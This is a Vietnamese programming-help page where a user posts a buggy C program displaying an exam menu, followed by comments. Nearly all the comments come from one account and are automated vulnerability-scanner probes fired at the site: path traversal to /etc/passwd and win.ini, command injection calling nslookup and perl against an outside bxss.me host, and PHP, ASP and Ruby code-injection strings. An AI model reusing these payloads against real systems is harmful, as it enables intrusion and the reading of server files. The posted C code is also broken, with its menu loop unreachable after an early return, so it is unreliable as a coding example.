#include <stdio.h>
#include <stdlib.h>
char printMenu();
int main()
{
    {
        char Name[100], MSSV[10];
        printf("*********Trường PT DTNT Cấp 2-3 Vĩnh Phúc*********\n");
        printf("* Môn thi: Tin học Pascal");
        printf("* Ngày thi: 12/12/2020 *\n");
        printf("* Nhập vào Họ và tên: *\n"); fgets(Name, sizeof(Name), stdin);
        printf("* Mã số học sinh: *\n"); fgets(MSSV, sizeof(MSSV), stdin);
        printf("*********************************************************\n");
        printf("Xin chào %s",Name);
        printf("* Ngày thi: 12/12/2020 *\n");
        printf("* Họ và tên: %s *\n",Name);
        printf("* Mã số học sinh: %s *\n",MSSV);
        printf("*********************************************************\n");
        printf("*Chọn một câu hỏi để bắt đầu:*\n");
        printf("* 1. Câu hỏi số 1 *\n");
        printf("* 2. Câu hỏi số 2 *\n");
        printf("* 3. Câu hỏi số 3*\n");
        printf("* 4. Thoát khỏi đề thi*\n");
        printf("* *\n");
        printf("***********************************************************\n");
        printf("\nNhập một số vào đây: ");
        fflush(stdin);
        return getc(stdin);
    }
    char userChoice;
    do {
        userChoice = printMenu(stdin);
        switch(userChoice)
        {
            case '1': printf("\n\nCâu 1: Hãy viết chương trình giải bài toán tính tổng của 50 số tự nhiên đầu tiên.\n\n");
                 break;
            case '2': printf("\nCâu 2: Viết chương trình nhập vào xâu kí tự họ tên và mã sinh viên của bạn.\n\n");
                 break;
            case '3': printf("\nCâu 3: Hãy tính biểu thức sau: 2X+30=25/18 với X là một số bất kì lớn hơn 100 từ bàn phím. Nếu vô nghiệm thì đưa ra màn hình PT vô nghiệm.\n\n");
                 break;
            case '4': exit(0);
                 break;
            case '0':
            default:
                 printf("\n\nLỖI! BẠN ĐÃ CHỌN SAI MỤC!\nVui lòng thử lại\n\n");
                 system("pause");
        }
    } while(userChoice!='1');
    system("pause");
    return 0;
}

Viết câu trả lời

Drop Images

2 Bình luận

manhbeo avatar

TIn học pascal sao lại chạy bằng c

phqghume avatar
phqghume avatar

response.write(9657809*9747677)

phqghume avatar

ZRdDyup4

phqghume avatar

'+response.write(9657809*9747677)+'

phqghume avatar

"+response.write(9657809*9747677)+"

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

../../../../../../../../../../../../../../etc/passwd

phqghume avatar
phqghume avatar

12345'"\'\");|]*{ <>

phqghume avatar
phqghume avatar

../../../../../../../../../../../../../../windows/win.ini

phqghume avatar
phqghume avatar

echo lomncl$()\ eizyvc\nz^xyu||a #' &echo lomncl$()\ eizyvc\nz^xyu||a #|" &echo lomncl$()\ eizyvc\nz^xyu||a #

phqghume avatar
phqghume avatar

../../../../../../../../../../../../../../../proc/version

phqghume avatar
phqghume avatar

&echo yobezb$()\ wxdwvo\nz^xyu||a #' &echo yobezb$()\ wxdwvo\nz^xyu||a #|" &echo yobezb$()\ wxdwvo\nz^xyu||a #

phqghume avatar

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

phqghume avatar
phqghume avatar

|echo eqjzaq$()\ jzarjy\nz^xyu||a #' |echo eqjzaq$()\ jzarjy\nz^xyu||a #|" |echo eqjzaq$()\ jzarjy\nz^xyu||a #

phqghume avatar
phqghume avatar

../../../../../../../../../../etc/passwd.vn/thanh-vien/manhbeo) :

phqghume avatar

${10000147+10000172}

phqghume avatar
phqghume avatar

(nslookup hitesxrwjgckee03de.bxss.me||perl -e "gethostbyname('hitesxrwjgckee03de.bxss.me')")

phqghume avatar
phqghume avatar

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.vn/thanh-vien/manhbeo) :

phqghume avatar
phqghume avatar

$(nslookup hitcrnhltiewq88d77.bxss.me||perl -e "gethostbyname('hitcrnhltiewq88d77.bxss.me')")

phqghume avatar
phqghume avatar

/../..//../..//../..//../..//../..//etc/passwd.vn/thanh-vien/manhbeo) :

phqghume avatar
phqghume avatar

&(nslookup hitgpcxcftlgaecb9c.bxss.me||perl -e "gethostbyname('hitgpcxcftlgaecb9c.bxss.me')")&'\"0&(nslookup hitgpcxcftlgaecb9c.bxss.me||perl -e "gethostbyname('hitgpcxcftlgaecb9c.bxss.me')")&'

phqghume avatar
phqghume avatar

.\./.\./.\./.\./.\./.\./etc/passwd

phqghume avatar
phqghume avatar

|(nslookup hityasqdxsaqy40495.bxss.me||perl -e "gethostbyname('hityasqdxsaqy40495.bxss.me')")

phqghume avatar

/etc/passwd

phqghume avatar

(nslookup hitegqykdglbq3e4a4.bxss.me||perl -e "gethostbyname('hitegqykdglbq3e4a4.bxss.me')")

phqghume avatar

@manhbeo :e@manhbeo : &n990853=v907232

phqghume avatar

%2fetc%2fpasswd

phqghume avatar

;(nslookup hitrknftccvax3367f.bxss.me||perl -e "gethostbyname('hitrknftccvax3367f.bxss.me')")|(nslookup hitrknftccvax3367f.bxss.me||perl -e "gethostbyname('hitrknftccvax3367f.bxss.me')")&(nslookup hitrknftccvax3367f.bxss.me||perl -e "gethostbyname('hitrknftccvax3367f.bxss.me')")

phqghume avatar
phqghume avatar

/.././.././.././.././.././.././.././../etc/./passwd%00

phqghume avatar

'.gethostbyname(lc('hitzm'.'iunvejzz066be.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(66).chr(120).chr(69).'

phqghume avatar
phqghume avatar

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

phqghume avatar

)

phqghume avatar

".gethostbyname(lc("hitkh"."mcfmniwh587f8.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(66).chr(120).chr(76)."

phqghume avatar
phqghume avatar

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

phqghume avatar

!(()&&!|||

phqghume avatar

1some_inexistent_file_with_long_name.vn/thanh-vien/manhbeo) :

phqghume avatar

../././../././../././../././../././../././../././../././../././../././etc/passwd

phqghume avatar

^(#$!@#$)(()))**

phqghume avatar
phqghume avatar

..

phqghume avatar
phqghume avatar

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

phqghume avatar
phqghume avatar

bxss.me

phqghume avatar

file:///etc/passwd

phqghume avatar

bxss.me/t/xss.html?%00

phqghume avatar

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

phqghume avatar
phqghume avatar

"+"A".concat(70-3).concat(22*4).concat(104).concat(75).concat(120).concat(80)+(require"socket" Socket.gethostbyname("hitqv"+"shbhzeks57958.bxss.me.")[3].to_s)+"

phqghume avatar

/../../../../../../../etc/passwd

phqghume avatar
phqghume avatar

';print(md5(31337));$a='

phqghume avatar
phqghume avatar

'+'A'.concat(70-3).concat(22*4).concat(121).concat(83).concat(97).concat(69)+(require'socket' Socket.gethostbyname('hitma'+'owzqkxyn50151.bxss.me.')[3].to_s)+'

phqghume avatar

/WEB-INF/web.xml

phqghume avatar
phqghume avatar

";print(md5(31337));$a="

phqghume avatar

C:\WINDOWS\system32\drivers\etc\hosts

phqghume avatar
phqghume avatar

${@print(md5(31337))}

phqghume avatar
phqghume avatar
phqghume avatar

../../../../../../../../../../windows/win.ini.vn/thanh-vien/manhbeo) :

phqghume avatar

${@print(md5(31337))}\

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

/../../../../../../../../../../boot.ini

phqghume avatar
phqghume avatar

tra-loi-comment

phqghume avatar

'.print(md5(31337)).'

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

tra-loi-comment

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

................\windows\win.ini

phqghume avatar

tra-loi-comment/.

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

................\windows\win.ini

phqghume avatar

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

phqghume avatar

/xfs.bxss.me

phqghume avatar
phqghume avatar
phqghume avatar

/.\./.\./.\./.\./.\./.\./windows/win.ini

phqghume avatar

981985

phqghume avatar
phqghume avatar
phqghume avatar

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar
phqghume avatar

'"

phqghume avatar

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

phqghume avatar
phqghume avatar
phqghume avatar